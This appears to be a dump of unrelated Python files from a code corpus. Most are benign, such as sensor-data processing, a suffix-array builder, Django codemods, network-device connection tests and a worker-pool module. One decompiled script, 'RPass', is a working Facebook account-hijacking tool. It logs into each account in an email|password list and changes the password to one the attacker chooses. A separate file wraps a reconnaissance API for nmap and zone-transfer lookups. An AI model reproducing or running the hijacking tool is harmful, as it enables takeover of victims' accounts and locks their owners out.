sensors['TYPE_GYROSCOPE'].append('LGE Gyroscope Sensor')
sensors['TYPE_GYROSCOPE'].append('MPU-6050 Gyroscope')
sensors['TYPE_GYROSCOPE'].append('BMI160 gyroscope (uncalibrated)')
sensors['TYPE_GYROSCOPE'].append('BMI160 gyroscope')
sensors['TYPE_LIGHT'] = []
sensors['TYPE_LIGHT'].append('CM3602 Light sensor')
sensors['TYPE_LIGHT'].append('Invensense Light')
sensors['TYPE_LIGHT'].append('Invensense Light -Wakeup Secondary')
sensors['TYPE_LIGHT'].append('LGE Light Sensor')
sensors['TYPE_LINEAR_ACCELERATION'] = []
sensors['TYPE_LINEAR_ACCELERATION'].append('Invensense Linear Acceleration')
sensors['TYPE_LINEAR_ACCELERATION'].append('Invensense Linear Acceleration-Wakeup Secondary')
sensors['TYPE_LINEAR_ACCELERATION'].append('Linear Acceleration')
sensors['TYPE_LINEAR_ACCELERATION'].append('Linear Acceleration Sensor')
sensors['TYPE_MAGNETIC_FIELD'] = []
sensors['TYPE_MAGNETIC_FIELD'].append('AK8973 3-axis Magnetic field sensor')
sensors['TYPE_MAGNETIC_FIELD'].append('ALPS 3-axis Magnetic field sensor')
sensors['TYPE_MAGNETIC_FIELD'].append('Invensense Magnetometer')
sensors['TYPE_MAGNETIC_FIELD'].append('Invensense Magnetometer -Wakeup Secondary')
sensors['TYPE_MAGNETIC_FIELD'].append('Invensense Magnetometer Uncalibrated')
sensors['TYPE_MAGNETIC_FIELD'].append('Invensense Magnetometer Uncalibrated -Wakeup Secondary')
sensors['TYPE_MAGNETIC_FIELD'].append('LGE Magnetometer Sensor')
sensors['TYPE_MAGNETIC_FIELD'].append('BMM150 magnetometer (uncalibrated)')
sensors['TYPE_MAGNETIC_FIELD'].append('BMM150 magnetometer')
sensors['TYPE_ORIENTATION'] = []
sensors['TYPE_ORIENTATION'].append('AK8973 Orientation sensor')
sensors['TYPE_ORIENTATION'].append('Game Rotation Vector')
sensors['TYPE_ORIENTATION'].append('Invensense Orientation')
sensors['TYPE_ORIENTATION'].append('Invensense Orientation-Wakeup Secondary')
sensors['TYPE_ORIENTATION'].append('Orientation')
sensors['TYPE_ORIENTATION'].append('Orientation Sensor')
sensors['TYPE_PRESSURE'] = []
sensors['TYPE_PRESSURE'].append('Invensense Barometer')
sensors['TYPE_PRESSURE'].append('Invensense Barometer -Wakeup Secondary')
sensors['TYPE_PRESSURE'].append('LGE Barometer Sensor')
sensors['TYPE_PRESSURE'].append('BMP280 pressure')
sensors['TYPE_PROXIMITY'] = []
sensors['TYPE_PROXIMITY'].append('CM3602 Proximity sensor')
sensors['TYPE_PROXIMITY'].append('GP2A - Proximity Sensor')
sensors['TYPE_PROXIMITY'].append('Invensense Proximity')
sensors['TYPE_PROXIMITY'].append('Invensense Proximity:Non Wakeup Secondary')
sensors['TYPE_PROXIMITY'].append('LGE Proximity Sensor')
sensors['TYPE_ROTATION_VECTOR'] = []
sensors['TYPE_ROTATION_VECTOR'].append('Game Rotation Vector')
sensors['TYPE_ROTATION_VECTOR'].append('Geomagnetic Rotation Vector')
sensors['TYPE_ROTATION_VECTOR'].append('Invensense Game Rotation Vector')
sensors['TYPE_ROTATION_VECTOR'].append('Invensense Game Rotation Vector-Wakeup Secondary')
sensors['TYPE_ROTATION_VECTOR'].append('Invensense Geomagnetic Rotation Vector')
sensors['TYPE_ROTATION_VECTOR'].append('Invensense Geomagnetic Rotation Vector-Wakeup Secondary')
sensors['TYPE_ROTATION_VECTOR'].append('Invensense Rotation Vector')
sensors['TYPE_ROTATION_VECTOR'].append('Invensense Rotation Vector-Wakeup Secondary')
sensors['TYPE_ROTATION_VECTOR'].append('Rotation Vector')
sensors['TYPE_ROTATION_VECTOR'].append('Rotation Vector Sensor')
sensors['TYPE_UNKNOWN'] = []
sensors['TYPE_UNKNOWN'].append('Device Position Classifier')
sensors['TYPE_UNKNOWN'].append('Invensense Significant Motion Detector')
sensors['TYPE_UNKNOWN'].append('Invensense Step Counter')
sensors['TYPE_UNKNOWN'].append('Invensense Step Counter-Wakeup Secondary')
sensors['TYPE_UNKNOWN'].append('Invensense Step Detector')
sensors['TYPE_UNKNOWN'].append('Invensense Step Detector-Wakeup Secondary')
sensors['TYPE_UNKNOWN'].append('Invensense Tilt')
sensors['TYPE_UNKNOWN'].append('Significant Motion')
with open(os.path.join(directory, 'sensortypes.json'), "w") as f:
print(json.dumps(sensors), file=f)
# read all csv files from directory and put the data in a neatly organized json file
def unify(directory, silent=False):
alldata = {}
for element in os.listdir(directory):
if(os.path.isdir(os.path.join(directory, element))):
if not silent:
print("reading", element)
alldata[element] = []
for f in sorted(os.listdir(os.path.join(directory, element))):
if not silent:
print("opening", f)
with open(os.path.join(directory, element, f), "r") as inp:
csvfile = csv.DictReader(inp, delimiter="\t")
data = []
deviceid = ''
for row in csvfile:
localdict = {}
for key in ('timestamp','x','y','z'):
localdict[key] = float(row[key])
data.append(localdict)
deviceid = row['displayname']
if(len(data) > 0):
ts0 = data[0]['timestamp']
for localdict in data:
localdict['timestamp'] -= ts0
alldata[element].append({'deviceid':deviceid, 'data':data})
with open(os.path.join(directory, "measurements.json"), "w") as f:
json.dump(alldata, f)
# take the data from the neatly organized measurements.json and sensortypes.json files,
# calculate the feature vectors and store them in normalizeddata.json,
# store the number of data points alongside the sensor names in enhancedsensors.json.
def extract(directory):
alldata = {}
sensortypes = {}
with open(os.path.join(directory, "measurements.json"), "r") as f:
alldata = json.load(f)
with open(os.path.join(directory, "sensortypes.json"), "r") as f:
sensortypes = json.load(f)
normalizeddata = {}
to_delete = []
for sensortype in sensortypes:
normalizeddata[sensortype] = {'data':[],'target_sensor_name':[], 'target_device_id':[]}
newsensorlist = {}
for sensorname in sensortypes[sensortype]:
totalcount = 0
if(sensorname in alldata):
for measurement in alldata[sensorname]:
meann = {}
minn = {}
maxx = {}
stddevv = {}
avgdevv = {}
skewnesss = {}
kurtosiss = {}
rmsamplitudee = {}
# calculate the features for each dimension, using the methods from features.py
for index in ('x','y','z'):
meann[index] = mean(measurement['data'], index)
minn[index] = lowest(measurement['data'], index)
maxx[index] = highest(measurement['data'], index)
stddevv[index] = stddev(measurement['data'], index, meann[index])
avgdevv[index] = avgdev(measurement['data'], index, meann[index])
skewnesss[index] = skewness(measurement['data'], index, meann[index], stddevv[index])
kurtosiss[index] = kurtosis(measurement['data'], index, meann[index], stddevv[index])
rmsamplitudee[index] = rmsamplitude(measurement['data'], index,)
normalizeddata[sensortype]['data'].append([len(measurement['data']), meann['x'], meann['y'], meann['z'], minn['x'], minn['y'], minn['z'], maxx['x'], maxx['y'], maxx['z'], stddevv['x'], stddevv['y'], stddevv['z'], avgdevv['x'], avgdevv['y'], avgdevv['z'], skewnesss['x'], skewnesss['y'], skewnesss['z'], kurtosiss['x'], kurtosiss['y'], kurtosiss['z'], rmsamplitudee['x'], rmsamplitudee['y'], rmsamplitudee['z'] ])
normalizeddata[sensortype]['target_sensor_name'].append(sensorname)
normalizeddata[sensortype]['target_device_id'].append(measurement['deviceid'])
totalcount += len(measurement['data'])
newsensorlist[sensorname] = totalcount
else:
to_delete.append(sensorname)
sensortypes[sensortype] = newsensorlist
with open(os.path.join(directory, "enhancedsensors.json"), "w") as f:
json.dump(sensortypes, f)
with open(os.path.join(directory, "normalizeddata.json"), "w") as f:
json.dump(normalizeddata, f)
def main():
parser = argparse.ArgumentParser(prog='processData')
parser.add_argument('-c', '--classes', help='create sensor classes metafile', action='store_true')
parser.add_argument('-u', '--unify', help='bring it into a nice format', action='store_true')
parser.add_argument('-x', '--extract', help='extract feature matrix', action='store_true')
parser.add_argument('-a', '--all', help='combination of classes, unify and extract', action='store_true')
parser.add_argument('-s', '--silent', help='suppress output', action='store_true')
parser.add_argument('target', help='target directory')
args = parser.parse_args()
silent = args.silent
if(not os.path.isdir(args.target)):
print("Error: Target '{}' does not exist".format(args.target))
sys.exit()
if(args.classes):
classes(args.target)
if(args.unify):
if not os.path.isfile(os.path.join(args.target, 'sensortypes.json')):
classes(args.target)
unify(args.target, silent)
if(args.extract):
if not os.path.isfile(os.path.join(args.target, 'sensortypes.json')):
classes(args.target)
if not os.path.isfile(os.path.join(args.target, 'measurements.json')):
unify(args.target, silent)
extract(args.target)
if(args.all):
classes(args.target)
unify(args.target, silent)
extract(args.target)
if __name__ == "__main__":
main() | StarcoderdataPython |
84427 | <gh_stars>1-10
def is_prime(num):
if num <= 1:
return False
d = 2
while d * d <= num and num % d != 0:
d += 1
return d * d > num | StarcoderdataPython |
3393415 | # uncompyle6 version 3.6.2
# Python bytecode 2.7
# Decompiled from: Python 2.7.17 (default, Oct 23 2019, 08:25:46)
# [GCC 4.2.1 Compatible Android (5220042 based on r346389c) Clang 8.0.7 (https://
# Embedded file name: <r>
try:
import os, sys, time
from multiprocessing.pool import ThreadPool
import mechanize
except ImportError:
print '\x1b[37m[\x1b[31mModuleError\x1b[37m] \x1b[34m mechanize not installed'
sys.exit()
class reset:
def __init__(self):
self.u = 'https://mbasic.facebook.com/{}'
self.banner()
def banner(self):
print '\x1b[37m\n ____ ____\n / __ \\/ __ \\____ ___________ \x1b[34mAuthor : \x1b[32mBL4CK DR460N\x1b[37m\n / /_/ / /_/ / __ `/ ___/ ___/ \x1b[34mName Tool : \x1b[32mRPass (Riset Password)\x1b[37m\n / _, _/ ____/ /_/ (__ |__ ) \x1b[34mMy Team : \x1b[32mWoll Cyber Team\x1b[37m\n/_/ |_/_/ \\__,_/____/____/\n\n'
self.main()
def main(self):
print '\x1b[37m[*] sparator (email|password)'
try:
list = raw_input('\x1b[37m[?] List Account : \x1b[32m')
self.file = open(list, 'r').read().splitlines()
except IOError:
print '\x1b[31m[*] File not found'
sys.exit()
print '\x1b[37m[!] Password must be 6 characters or more'
self.newpas = raw_input('\x1b[37m[?] New Password : \x1b[32m')
if self.newpas < 6:
print '\x1b[37m[!] Password must be 6 characters or more'
sys.exit()
for i in self.file:
self.login(i)
print '\x1b[32m[+] DONE, file save as : \x1b[34mout/new.txt'
def login(self, id):
global br
try:
br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36')]
br.open(self.u.format('/login'))
br.select_form(nr=0)
br.form['email'] = id.split('|')[0]
br.form['pass'] = id.split('|')[1]
sub = br.submit().read()
if 'save-device' in str(sub) or 'm_sess' in str(sub):
self.set(id)
else:
print ('\x1b[31m[FL] {}').format(id)
except:
pass
def set(self, id):
br.open(self.u.format('/settings/security/password/'))
br._factory.is_html = True
br.select_form(nr=1)
br.form['password_old'] = id.split('|')[1]
br.form['password_new'] = self.newpas
br.form['password_confirm'] = self.newpas
mit = br.submit().read()
if 'Kata Sandi Telah Diubah' in str(mit) or 'Password Changed' in str(mit):
try:
os.mkdir('out')
except:
pass
with open('out/new.txt', 'a') as (sv):
sv.write('{}|{}\n').format(id.split('|')[0], self.newpas)
print ('\x1b[37m[\x1b[32mOK\x1b[37m] \x1b[32mSUCCESS To Riset \x1b[34m{} \x1b[37m>> \x1b[32m{}|{}').format(self.id, id.split('|')[0], self.newpas)
reset() | StarcoderdataPython |
1602171 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
def hackertarget_api(choice, target):
request_urls = [
"https://api.hackertarget.com/mtr/?q=",
"https://api.hackertarget.com/nping/?q=",
"https://api.hackertarget.com/dnslookup/?q=",
"https://api.hackertarget.com/reversedns/?q=",
"https://api.hackertarget.com/hostsearch/?q=",
"https://api.hackertarget.com/findshareddns/?q=",
"https://api.hackertarget.com/zonetransfer/?q=",
"https://api.hackertarget.com/whois/?q=",
"https://api.hackertarget.com/geoip/?q=",
"https://api.hackertarget.com/reverseiplookup/?q=",
"https://api.hackertarget.com/nmap/?q=",
"https://api.hackertarget.com/subnetcalc/?q=",
"https://api.hackertarget.com/httpheaders/?q=",
"https://api.hackertarget.com/pagelinks/?q=",
]
request_url = request_urls[choice-1]
url = request_url + target
request = requests.get(url)
return request.text
| StarcoderdataPython |
1752848 | # python3
import sys
def sortcharecters(text):
count = [0] * 255
order = [None] * len(text)
for c in text:
count[ord(c)] += 1
for i in range(255):
count[i] += count[i - 1]
for i in range(len(text)-1,-1,-1):
count[ord(text[i])] -= 1
order[count[ord(text[i])]] = i
return order
def singleclass(order, text):
clas = [None] * len(text)
clas[order[0]] = 0
for i in range(1, len(text)):
if text[order[i]] != text[order[i - 1]]:
clas[order[i]] = clas[order[i-1]] + 1
else:
clas[order[i]] = clas[order[i-1]]
return clas
def doubleorder(L, text, order, clas):
n = len(text)
count = [0] * n
neworder = [None] * n
for i in range(0, n):
count[clas[i]] += 1
for i in range(1, n):
count[i] += count[i - 1]
for i in range(n - 1, -1, -1):
start = (order[i] - L + n) % n
count[clas[start]] -= 1
neworder[count[clas[start]]] = start
return neworder
def updateclass(L, order, clas):
n = len(clas)
newclass = [None] * n
newclass[order[0]] = 0
for i in range(1, n):
cur, prev = order[i], order[i - 1]
mid, midprev = (cur + L) % n, (prev + L) % n
if clas[cur] != clas[prev] or clas[mid] != clas[midprev]:
newclass[cur] = newclass[prev] + 1
else:
newclass[cur] = newclass[prev]
return newclass
def build_suffix_array(text):
"""
Build suffix array of the string text and
return a list result of the same length as the text
such that the value result[i] is the index (0-based)
in text where the i-th lexicographically smallest
suffix of text starts.
"""
#result = []
# Implement this function yourself
order = sortcharecters(text)
clas = singleclass(order, text)
L = 1
while L < len(text):
order = doubleorder(L, text, order, clas)
clas = updateclass(L, order, clas)
L *= 2
return order
if __name__ == '__main__':
text = sys.stdin.readline().strip()
print(" ".join(map(str, build_suffix_array(text))))
| StarcoderdataPython |
95830 | <filename>Data Structure/Matrix/Addition of Two Matrices/SolutionByRiya.py
rows= int(input("Enter the number of rows: "))
cols= int(input("Enter the number of columns: "))
matrixA=[]
print("Enter the entries rowwise for matrix A: ")
for i in range(rows):
a=[]
for j in range(cols):
a.append(int(input()))
matrixA.append(a)
matrixB=[]
print("Enter the entries rowwise for matrix B: ")
for i in range(rows):
b=[]
for j in range(cols):
b.append(int(input()))
matrixB.append(b)
matrixResultant=[[ 0 for i in range(rows) ] for j in range(cols)]
for i in range(rows):
for j in range(cols):
matrixResultant[i][j]=matrixA[i][j]+matrixB[i][j]
for r in matrixResultant:
print (r)
| StarcoderdataPython |
1716388 | from libcst import BaseExpression, Call
from libcst import matchers as m
from django_codemod.constants import DJANGO_2_0, DJANGO_3_0, DJANGO_4_0
from django_codemod.visitors.base import (
BaseDjCodemodTransformer,
BaseFuncRenameTransformer,
)
class HttpUrlQuoteTransformer(BaseFuncRenameTransformer):
"""Replace `django.utils.http.urlquote` by `urllib.parse.quote`."""
deprecated_in = DJANGO_3_0
removed_in = DJANGO_4_0
rename_from = "django.utils.http.urlquote"
rename_to = "urllib.parse.quote"
class HttpUrlQuotePlusTransformer(BaseFuncRenameTransformer):
"""Replace `django.utils.http.urlquote_plus` by `urllib.parse.quote_plus`."""
deprecated_in = DJANGO_3_0
removed_in = DJANGO_4_0
rename_from = "django.utils.http.urlquote_plus"
rename_to = "urllib.parse.quote_plus"
class HttpUrlUnQuoteTransformer(BaseFuncRenameTransformer):
"""Replace `django.utils.http.urlunquote` by `urllib.parse.unquote`."""
deprecated_in = DJANGO_3_0
removed_in = DJANGO_4_0
rename_from = "django.utils.http.urlunquote"
rename_to = "urllib.parse.unquote"
class HttpUrlUnQuotePlusTransformer(BaseFuncRenameTransformer):
"""Replace `django.utils.http.urlunquote_plus` by `urllib.parse.unquote_plus`."""
deprecated_in = DJANGO_3_0
removed_in = DJANGO_4_0
rename_from = "django.utils.http.urlunquote_plus"
rename_to = "urllib.parse.unquote_plus"
class IsSafeUrlTransformer(BaseFuncRenameTransformer):
"""Rename `django.utils.http.is_safe_url` to `url_has_allowed_host_and_scheme`."""
deprecated_in = DJANGO_3_0
removed_in = DJANGO_4_0
rename_from = "django.utils.http.is_safe_url"
rename_to = "django.utils.http.url_has_allowed_host_and_scheme"
class HttpRequestXReadLinesTransformer(BaseDjCodemodTransformer):
"""Replace `HttpRequest.xreadlines()` by iterating over the request."""
deprecated_in = DJANGO_2_0
removed_in = DJANGO_3_0
# This should be conservative and only apply changes to:
# - variables called `request`/`req`
# - `request`/`req` attributes (e.g `self.request`/`view.req`...)
matcher = m.Call(
func=m.Attribute(
value=m.OneOf(
m.Name(value="request"),
m.Name(value="req"),
m.Attribute(attr=m.Name(value="request")),
m.Attribute(attr=m.Name(value="req")),
),
attr=m.Name(value="xreadlines"),
)
)
def leave_Call(self, original_node: Call, updated_node: Call) -> BaseExpression:
if m.matches(updated_node, self.matcher):
return updated_node.func.value
return super().leave_Call(original_node, updated_node)
| StarcoderdataPython |
1642324 | <filename>src/unicon/plugins/tests/test_plugin_iosxe_quad.py
"""
Unittests for IOSXE/Quad plugin
"""
import unittest
from unittest.mock import patch
from pyats.topology import loader
import unicon
from unicon import Connection
from unicon.plugins.tests.mock.mock_device_iosxe import MockDeviceTcpWrapperIOSXE
@patch.object(unicon.settings.Settings, 'POST_DISCONNECT_WAIT_SEC', 0)
@patch.object(unicon.settings.Settings, 'GRACEFUL_DISCONNECT_WAIT_SEC', 0)
class TestIosXEQuadConnect(unittest.TestCase):
def test_quad_connect(self):
md = MockDeviceTcpWrapperIOSXE(port=0,
quad=True,
state='quad_login,quad_ics_login,quad_stby_login,quad_ics_login')
md.start()
d = Connection(hostname='Router',
start=['telnet 127.0.0.1 ' + str(i) for i in md.ports[:]],
os='iosxe',
chassis_type='quad',
username='cisco',
tacacs_password='<PASSWORD>',
enable_password='<PASSWORD>')
d.connect()
self.assertTrue(d.active.alias == 'a')
d.disconnect()
md.stop()
def test_quad_connect2(self):
d = Connection(hostname='Router',
start=['mock_device_cli --os iosxe --state quad_login',
'mock_device_cli --os iosxe --state quad_ics_login',
'mock_device_cli --os iosxe --state quad_stby_login',
'mock_device_cli --os iosxe --state quad_ics_login'],
os='iosxe',
chassis_type='quad',
username='cisco',
tacacs_password='<PASSWORD>',
enable_password='<PASSWORD>')
d.connect()
d.execute('term width 0')
self.assertEqual(d.spawn.match.match_output, 'term width 0\r\nRouter#')
d.disconnect()
def test_quad_connect3(self):
md = MockDeviceTcpWrapperIOSXE(port=0,
quad=True,
state='quad_login,quad_ics_login,quad_stby_login,quad_ics_login')
md.start()
testbed = '''
devices:
Router:
type: router
os: iosxe
chassis_type: quad
credentials:
default:
password: <PASSWORD>
username: cisco
enable:
password: <PASSWORD>
username: cisco
connections:
defaults:
class: 'unicon.Unicon'
connections: [a, b, c, d]
a:
protocol: telnet
ip: 127.0.0.1
port: {}
member: 1
b:
protocol: telnet
ip: 127.0.0.1
port: {}
member: 1
c:
protocol: telnet
ip: 127.0.0.1
port: {}
member: 2
d:
protocol: telnet
ip: 127.0.0.1
port: {}
member: 2
'''.format(md.ports[0], md.ports[1], md.ports[2], md.ports[3])
t = loader.load(testbed)
d = t.devices.Router
d.connect()
self.assertTrue(d.active.alias == 'a')
d.execute('term width 0')
d.configure('no logging console')
d.disconnect()
md.stop()
class TestIosXEQuadDisableEnable(unittest.TestCase):
def test_disable_enable(self):
d = Connection(hostname='Router',
start=['mock_device_cli --os iosxe --state quad_login',
'mock_device_cli --os iosxe --state quad_ics_login',
'mock_device_cli --os iosxe --state quad_stby_login',
'mock_device_cli --os iosxe --state quad_ics_login'],
os='iosxe',
chassis_type='quad',
username='cisco',
tacacs_password='<PASSWORD>',
enable_password='<PASSWORD>')
d.connect()
d.disable()
self.assertEqual(d.spawn.match.match_output, 'disable\r\nRouter>')
d.enable()
self.assertEqual(d.spawn.match.match_output, 'cisco\r\nRouter#')
d.disable(target='standby')
self.assertEqual(d.standby.spawn.match.match_output, 'disable\r\nRouter-stby>')
d.enable(target='standby')
self.assertEqual(d.standby.spawn.match.match_output, 'cisco\r\nRouter-stby#')
d.disconnect()
class TestIosXEQuadGetRPState(unittest.TestCase):
def test_get_rp_state(self):
d = Connection(hostname='Router',
start=['mock_device_cli --os iosxe --state quad_login',
'mock_device_cli --os iosxe --state quad_ics_login',
'mock_device_cli --os iosxe --state quad_stby_login',
'mock_device_cli --os iosxe --state quad_ics_login'],
os='iosxe',
chassis_type='quad',
username='cisco',
tacacs_password='<PASSWORD>',
enable_password='<PASSWORD>')
d.connect()
r = d.get_rp_state(target='active')
self.assertEqual(r, 'ACTIVE')
r = d.get_rp_state(target='standby')
self.assertEqual(r, 'STANDBY')
r = d.get_rp_state(target='b')
self.assertEqual(r, 'IN_CHASSIS_STANDBY')
d.disconnect()
@patch.object(unicon.settings.Settings, 'POST_DISCONNECT_WAIT_SEC', 0)
@patch.object(unicon.settings.Settings, 'GRACEFUL_DISCONNECT_WAIT_SEC', 0)
class TestIosXEQuadSwitchover(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.md = MockDeviceTcpWrapperIOSXE(port=0,
quad=True,
state='quad_login,quad_ics_login,quad_stby_login,quad_ics_login')
cls.md.start()
cls.d = Connection(hostname='Router',
start=['telnet 127.0.0.1 ' + str(i) for i in cls.md.ports[:]],
os='iosxe',
chassis_type='quad',
username='cisco',
tacacs_password='<PASSWORD>',
enable_password='<PASSWORD>')
cls.d.connect()
@classmethod
def tearDownClass(cls):
cls.d.disconnect()
cls.md.stop()
def test_reload(self):
self.d.switchover()
@patch.object(unicon.settings.Settings, 'POST_DISCONNECT_WAIT_SEC', 0)
@patch.object(unicon.settings.Settings, 'GRACEFUL_DISCONNECT_WAIT_SEC', 0)
class TestIosXEQuadReload(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.md = MockDeviceTcpWrapperIOSXE(port=0,
quad=True,
state='quad_login,quad_ics_login,quad_stby_login,quad_ics_login')
cls.md.start()
cls.d = Connection(hostname='Router',
start=['telnet 127.0.0.1 ' + str(i) for i in cls.md.ports[:]],
os='iosxe',
chassis_type='quad',
username='cisco',
tacacs_password='<PASSWORD>',
enable_password='<PASSWORD>')
cls.d.connect()
@classmethod
def tearDownClass(cls):
cls.d.disconnect()
cls.md.stop()
def test_reload(self):
self.d.reload()
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
105244 | <filename>scripts/viz_example.py
"""
Visualize which images have low and high confidence scores in training set.
"""
import os
import torch
import numpy as np
from tqdm import tqdm
from copy import deepcopy
from dotmap import DotMap
from src.utils import utils
from torchvision import transforms
from torch.utils.data import DataLoader
from src.systems.simclr import SimCLRSystem, TaU_SimCLRSystem
from src.systems.mocov2 import MoCoV2System, TaU_MoCoV2System
from src.systems.transfer import TransferSystem, Pretrained_TaU_SimCLRSystem
from torchvision.utils import save_image, make_grid
from src.datasets.utils import DICT_ROOT
from src.datasets.cifar10 import CIFAR10
from src.datasets.cifar100 import CIFAR100
from src.datasets.imagenet import ImageNet
from src.datasets.transforms import get_transforms
from src.datasets.transforms import IMAGE_SHAPE, CROP_SHAPE
@torch.no_grad()
def viz(exp_dir, checkpoint_name, dataset, gpu_device=-1):
config_path = os.path.join(exp_dir, 'config.json')
config_json = utils.load_json(config_path)
config = DotMap(config_json)
config.dataset.name = dataset
if gpu_device >= 0:
config.gpu_device = gpu_device
config.cuda = True
device = torch.device(f'cuda:{gpu_device}')
else:
config.cuda = False
device = torch.device('cpu')
SystemClass = globals()[config.system]
system = SystemClass(config)
checkpoint_file = os.path.join(exp_dir, 'checkpoints', checkpoint_name)
checkpoint = torch.load(checkpoint_file, map_location='cpu')
system.load_state_dict(checkpoint['state_dict'])
system.config = config
system = system.eval()
system = system.to(device)
norms = []
labels = []
with torch.no_grad():
val_loader = DataLoader(system._val_dataset, batch_size=128, shuffle=False, num_workers=8)
pbar = tqdm(total=len(val_loader))
for batch in val_loader:
image, label = batch[1], batch[-1]
image = image.to(device)
mean, score = system.forward(image)
norms.append(score.squeeze(-1))
labels.append(label.cpu().numpy())
pbar.update()
pbar.close()
norms = np.concatenate(norms)
labels = np.concatenate(labels).astype(int)
dataset = get_datasets(config.dataset.name, train=False)
N = 6
all_low, all_high = [], []
for label in [0, 3, 4, 5, 7, 8]:
norms_l = norms[labels == label]
order_l = np.argsort(norms_l)
indices_l = np.where(labels == label)[0]
indices_l = indices_l[order_l]
low = indices_l[:N]
high = indices_l[-N:]
low_images = []
low_labels = []
for index in low:
_, image, label = dataset.__getitem__(index)
low_images.append(image)
low_labels.append(label)
all_low.extend(low_images)
high_images = []
high_labels = []
for index in high:
_, image, label = dataset.__getitem__(index)
high_images.append(image)
high_labels.append(label)
all_high.extend(high_images)
all_low = make_grid(all_low, nrow=N)
all_high = make_grid(all_high, nrow=N)
return all_low, all_high
def get_datasets(name, train=True):
image_transforms = transforms.Compose([
transforms.Resize(IMAGE_SHAPE[name]),
transforms.CenterCrop(CROP_SHAPE[name]),
transforms.ToTensor(),
])
root = DICT_ROOT[name]
if name == 'cifar10':
dataset = CIFAR10(root, train=train, image_transforms=image_transforms)
elif name == 'cifar100':
dataset = CIFAR100(root, train=train, image_transforms=image_transforms)
elif name == 'stl10':
dataset = STL10(root, train=train, image_transforms=image_transforms)
elif name == 'tinyimagenet' or name == 'imagenet':
dataset = ImageNet(root, train=train, image_transforms=image_transforms)
else:
raise Exception(f'Dataset {name} not supported.')
return dataset
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('exp_dir', type=str, default='experiment directory')
parser.add_argument('checkpoint_name', type=str, help='checkpoint name')
parser.add_argument('--dataset', type=str, default=None)
parser.add_argument('--gpu-device', type=int, default=-1)
args = parser.parse_args()
out_dir = os.path.join(args.exp_dir, 'viz')
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
grid_low, grid_high = viz(
args.exp_dir,
checkpoint_name=args.checkpoint_name,
dataset=args.dataset,
gpu_device=args.gpu_device)
save_image(grid_low, os.path.join(out_dir, 'low_score.png'))
save_image(grid_high, os.path.join(out_dir, 'high_score.png'))
| StarcoderdataPython |
54763 | <reponame>comps/pexen
import sys
from collections import namedtuple
import threading
import queue
import multiprocessing
import multiprocessing.queues # for picklability check
import pickle
from . import common, meta
class PoolError(common.SchedulerError):
"""Raised by ProcessWorkerPool or ThreadWorkerPool."""
pass
def _is_picklable(obj):
try:
pickle.dumps(obj)
return True
except (TypeError, AttributeError):
return False
# used internally by WorkerPool classes
_PoolWorkerMsg = namedtuple('_PoolWorkerMsg', ['workid', 'type', 'taskidx',
'shared', 'ret', 'excinfo'])
# TODO: use Python 3.7 namedtuple defaults
_PoolWorkerMsg.__new__.__defaults__ = (None,) * len(_PoolWorkerMsg._fields)
# TODO: also document that by delaying iteration of iter_results, the user
# can effectively throttle the execution as no new items will be scheduled
# until the user gives us back control
class ProcessWorkerPool:
_Queue = multiprocessing.Queue
_Worker = multiprocessing.Process
def __init__(self, workers=1, spare=1):
self.wanted_workers = workers
self.wanted_spare = spare
self.unfinished_workers = 0
self.taskq = self._Queue()
self.resultq = self._Queue()
self.active_tasks = 0
self.shutting_down = False
self.workers = []
# this serves two purposes:
# - it lets us pass a picklable integer into the worker instead of
# a potentially unpicklable callable
# - it lets the worker return a picklable integer, which we then
# transform back to the callable before returning it to the user
self.taskmap = {}
def _worker_body(self, workid, outqueue, inqueue):
while True:
taskinfo = inqueue.get()
if taskinfo is None:
msg = _PoolWorkerMsg(workid, 'finished')
outqueue.put(msg)
break
try:
taskidx, shared = taskinfo
task = self.taskmap[taskidx]
kwargs = meta.get_kwargs(task)
ret = None
# support special case: argument-less task, for simplicity
if task.__code__.co_argcount == 0:
ret = task(**kwargs)
else:
ret = task(shared, **kwargs)
if isinstance(outqueue, multiprocessing.queues.Queue):
if not _is_picklable(ret):
raise AttributeError("Can't pickle callable return value")
if not _is_picklable(shared):
raise AttributeError("Can't pickle callable shared state")
msg = _PoolWorkerMsg(workid, 'taskdone', taskidx, shared, ret)
outqueue.put(msg)
except Exception:
extype, exval, extb = sys.exc_info()
# multiprocessing.Queue prints a TypeError if an object is not
# picklable, but doesn't actually raise an exception, so we need
# to check picklability manually
if isinstance(outqueue, multiprocessing.queues.Queue):
if not _is_picklable(ret):
ret = None
if not _is_picklable(shared):
shared = None
if not _is_picklable(exval):
exval = None
if not _is_picklable(extb):
extb = None
msg = _PoolWorkerMsg(workid, 'taskdone', taskidx, shared, ret,
common.ExceptionInfo(extype, exval, extb))
outqueue.put(msg)
# in case the above ever gets fixed:
#try:
# outqueue.put((taskidx, None, (extype, exval, extb)))
#except TypeError:
# try:
# outqueue.put((taskidx, None, (extype, exval, None)))
# except TypeError:
# outqueue.put((taskidx, None, (extype, None, None)))
def start(self):
if self.unfinished_workers > 0:
raise PoolError("Cannot re-start a running pool")
self.workers = []
for workid in range(self.wanted_workers):
w = self._Worker(target=self._worker_body,
args=(workid, self.resultq, self.taskq))
w.start()
self.workers.append(w)
self.unfinished_workers = self.wanted_workers
self.max_tasks = self.wanted_workers + self.wanted_spare
self.shutting_down = False
def full(self):
return self.active_tasks >= self.max_tasks
def empty(self):
return self.active_tasks <= 0
def idlecnt(self):
return self.max_tasks - self.active_tasks
# self.unfinished_workers represent how many workers owe us
# msg.type==finished so that we know whether we should wait for more task
# results to come from the queue in self.iter_results() or return to user
# - this will be 0 if the user exhausted all iter_results()
# - but it will be non-0 if the user just called shutdown(wait=True)
#
# self.alive represents how many actual OS threads or processes are running
# so we know when it's safe to modify the shared non-fork()ed state
# - this will be 0 regardless of whether the user called iter_results()
# - it will be 0 after shutdown(wait=True) returns
# - it may be non-0 right after shutdown(wait=False), but it will itself
